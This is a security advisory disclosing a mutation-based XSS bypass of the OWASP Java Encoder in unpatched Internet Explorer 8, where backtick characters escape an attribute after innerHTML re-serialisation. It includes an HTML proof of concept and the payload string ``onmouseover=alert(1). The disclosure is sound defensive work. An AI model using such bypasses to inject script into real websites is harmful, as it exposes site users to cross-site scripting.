*#Product: OWASP Java Encoder*
*#Vulnerability: Mutation Based XSS Bypass *
*#Impact: Medium/Limited*
*#Authors: Rafay Baloch And Alex Infuhr*
*#Company: RHAinfoSEC *
*#Website: http://services.rafayhackingarticles.net
<http://services.rafayhackingarticles.net>*
*#Status: To be fixed in the next release*

*=========*
*Description*
*=========*

Owasp encoder is an encoding library, that attempts to protect the website
users by encoding any un-trusted input before it's reflected back.

*=========*
*Vulnerability*
*==========*

The issue occurs inside of internet explorer only because treats accent
grave ` as a delimiter character,  and we can escape out of a valid
attribute inside of an un-patched IE 8, since it does not put double quotes
around our vector when it's returned via innerHTML property.

*=============*
*Proof of concept*
*=============*

Here is the POC that came by slightly modifying the following example at
html5sec.org#59.

The POC was tested in Internet explorer version 8:
<html>
<head>
</head>
<div id="a"><input value="``onmouseover=alert(1)"></div>
<div id="b"></div>
<script>b.innerHTML=a.innerHTML</script>
</html>

*Attacker's Input:*

``onmouseover=alert(1)

*Vulnerable Browsers Output:*

<div id="a"><input value=``onmouseover=alert(1)></div>

*Patched Browsers Output:*

<div id="a"><input value="``onmouseover=alert(1)"></div>

When the above POC is tested inside of an unpatched Internet explorer 8, it
was noticed that IE 8 does not places quotes around it when it's rendered
by innerHTML property. However, When placed in a patched version of
internet explorer, it  places double quotes around when the string is
returned back to the user, hence stopping the attack.

*===*
*Fix*
*===*

Currently, I am not aware of any other solutions then stripping out the
accent grave character, encoding doesn't seems to solve the problem here.

*==========*
*References*
*==========*

http://html5sec.org/#59
http://www.slideshare.net/x00mario/the-innerhtml-apocalypse
https://cure53.de/fp170.pdf